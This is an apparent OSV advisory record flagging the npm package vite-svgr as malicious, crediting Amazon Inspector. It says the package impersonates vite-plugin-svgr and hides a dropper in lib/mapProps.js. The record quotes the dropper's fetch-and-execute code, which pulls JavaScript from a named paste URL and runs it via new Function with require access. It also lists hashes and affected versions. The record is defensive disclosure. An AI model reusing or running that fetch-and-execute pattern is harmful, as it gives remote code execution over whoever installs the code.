{"id":"MAL-2026-5708","summary":"Malicious code in vite-svgr (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5)\nPackage name `vite-svgr` impersonates the popular `vite-plugin-svgr`, but the shipped code is a fork of `tsconfig-paths` (package.json description: 'Load node modules according to tsconfig paths') with an added remote-code-execution dropper at lib/mapProps.js. The dropper performs `axios.get('https://www.jsonkeeper.com/b/EQUBH', { headers: { 'x-secret-key': '_' } })` and then runs the response body's `Cookie` field via `new Function('require', s)(require)` — arbitrary JavaScript with full Node `require` access executed under the installer's user. The code is reachable from the package's `main` via the exported `configJson(...)`, which spawns `node lib/mapProps.js` detached, so any consumer that imports this package and calls `configJson` triggers fetch-and-execute against an anonymous, mutable paste host. The combination of name impersonation, fork of an unrelated library, and remote-payload-execution is the canonical supply-chain attack shape.\n","modified":"2026-06-12T20:01:57.882374057Z","published":"2026-06-12T19:27:21Z","database_specific":{"malicious-packages-origins":[{"versions":["1.1.3"],"modified_time":"2026-06-12T19:27:28Z","id":"IN-MAL-2026-006215","sha256":"a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5","source":"amazon-inspector","import_time":"2026-06-12T19:44:20.792697857Z"},{"versions":["1.1.2"],"modified_time":"2026-06-12T19:27:21Z","id":"IN-MAL-2026-006214","sha256":"d238c0e37d7a415f10030826af53fbff9c537bfd527553c8005fd51f6499f0c4","source":"amazon-inspector","import_time":"2026-06-12T19:44:20.686148115Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/vite-svgr/v/1.1.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/vite-svgr/v/1.1.2"}],"affected":[{"package":{"name":"vite-svgr","ecosystem":"npm","purl":"pkg:npm/vite-svgr"},"versions":["1.1.3","1.1.2"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"sha1":"c11089a280629728d200c5267bb619eb6d0ead2f","sha512_sri":"sha512-sHDAZ7u5LzJv7qMMawgKsqLRRh3xlnE5ryc/1M0p6kqjSVCpEGjLvcF/xwt+9zUsoeD8fGa57Z0CgaH8jgxtCg=="},"filename":"vite-svgr-1.1.3.tgz"}],"evidence_files":[{"tlsh":"8c21124f757ca0a8017013f5672be426f965643f300290d5739c87a21f3655d6142fde","path":"lib/mapProps.js","sha256":"cbb95b591c97bbdc1a2f6aa41c118be14ed1e53eee6d05740317ce58942da860"},{"tlsh":"e041b924c928cdb365c0526a787d5681e238444b4d99fc08b3e5536e4f4c2bf62b57ae","path":"package.json","sha256":"4d4f104d657b848c012ccc74af88f8769891687cf6dee211688403cfe6313929"}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-svgr/MAL-2026-5708.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}